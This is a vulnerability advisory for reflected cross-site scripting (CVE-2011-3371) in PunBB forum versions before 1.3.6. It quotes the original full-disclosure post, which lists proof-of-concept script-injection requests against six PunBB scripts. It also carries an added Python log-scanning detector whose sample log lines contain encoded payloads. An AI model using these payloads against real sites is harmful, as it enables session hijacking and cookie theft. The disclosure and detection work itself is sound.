Category:   Application (Forum/Board/Portal)  >   PunBB
Vendors:   punbb.org
PunBB Input Validation Holes Permit Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1026073
SecurityTracker URL:  http://securitytracker.com/id/1026073
CVE Reference:   CVE-2011-3371
Updated:  Sep 23 2011
Original Entry Date:  Sep 20 2011
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): prior to 1.3.6
Description:   A vulnerability was reported in PunBB. A remote user can conduct cross-site scripting attacks.

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the PunBB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The 'login.php', 'delete.php', 'edit.php', 'misc.php', 'profile.php', and 'register.php' scripts are affected.
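
A detection sketch for the pattern described above, added here as an example (it is not part of the advisory or of PunBB): it scans web-server access-log lines for requests to the affected scripts whose query parameters carry HTML metacharacters or do not match an expected shape. The log lines are constructed, and the expected parameter shapes (hex csrf_token, numeric id/fid, lowercase action) are assumptions inferred from the requests in the source message.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Scripts the advisory lists as affected (PunBB prior to 1.3.6).
AFFECTED = {"login.php", "delete.php", "edit.php", "misc.php",
            "profile.php", "register.php"}

# Assumed parameter shapes, inferred from the requests in the source message;
# they are not taken from PunBB's source code.
EXPECTED = {
    "csrf_token": re.compile(r"[0-9a-fA-F]+"),
    "id": re.compile(r"\d+"),
    "fid": re.compile(r"\d+"),
    "action": re.compile(r"[a-z_]+"),
}
MARKUP = re.compile(r"[<>\"']")  # characters that can break out of HTML context
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines in Common Log Format (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Sep/2011:10:00:01 +0000] "GET /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79 HTTP/1.1" 302 0',
    '192.0.2.44 - - [16/Sep/2011:10:00:07 +0000] "GET /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786%22/%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5120',
    '192.0.2.44 - - [16/Sep/2011:10:00:09 +0000] "POST /delete.php?id=%3E%22%27%3E%3Cscript%3E HTTP/1.1" 200 4096',
    '192.0.2.10 - - [16/Sep/2011:10:00:12 +0000] "GET /viewtopic.php?id=7 HTTP/1.1" 200 9000',
]


def suspicious_params(log_line):
    """Return [(script, param, reason)] for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    script = url.path.rsplit("/", 1)[-1]
    if script not in AFFECTED:
        return []
    findings = []
    # parse_qsl percent-decodes values, so encoded markup is seen in the clear.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if MARKUP.search(value):
            findings.append((script, name, "markup"))
        elif name in EXPECTED and not EXPECTED[name].fullmatch(value):
            findings.append((script, name, "unexpected format"))
    return findings


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line))
```

Access logs record only the query string, so the POST body parameters shown in the source message are visible only where request bodies are logged, for example at a reverse proxy or WAF.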

Piotr Duszynski (@drk1wi) reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PunBB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a fix (1.3.6).

The vendor's advisory is available at:

http://punbb.informer.com/forums/topic/24430/punbb-136/

Vendor URL:  punbb.informer.com/forums/topic/24430/punbb-136/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] PunBB PHP Forum - Multiple XSS

=======================================================================
PunBB PHP Forum - Multiple XSS
=======================================================================

Affected Software : PunBB PHP Forum
Severity          : Medium
Local/Remote      : Remote
Author            : @drk1wi

[Summary]

Just for those whom it might concern.
These vulnerabilities have been identified for the latest (clean 
version 1.3.5) during one of my penetration tests.

[Vulnerability Details]


GET /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script>
GET /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script>

POST /delete.php?id=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_confirm=>"'><script>alert(oink)</script>&delete=>"'><script>alert(oink)</script>

POST /edit.php?id=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>

POST /login.php?action=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_email=>"'><script>alert(oink)</script>&request_pass=>"'><script>alert(oink)</script>

POST /misc.php?email=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&redirect_url=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_subject=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>

POST /profile.php?action=>"'><script>alert(oink)</script>&id=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_old_password=>"'><script>alert(oink)</script>&req_new_password1=>"'><script>alert(oink)</script>&req_new_password2=>"'><script>alert(oink)</script>&update=>"'><script>alert(oink)</script>

POST /register.php?action=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_username=>"'><script>alert(oink)</script>&req_password1=>"'><script>alert(oink)</script>&req_password2=>"'><script>alert(369448)</script>&req_email1=>"'><script>alert(oink)</script>&timezone=>"'><script>alert(oink)</script>&register=>"'><script>alert(oink)</script>


[Time-line]

20/08/2011 - Vendor notified
02/09/2011 - No e-mail reply and BAN on Forum
???        - Vendor patch release
16/09/2011 - Public disclosure

[Fix Information]


Cheers,
Piotr Duszynski (@drk1wi)
http://sharpsec.net

X. LEGAL NOTICES

Copyright (c) 2011 Piotr "drk1wi" Duszynski

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 
 

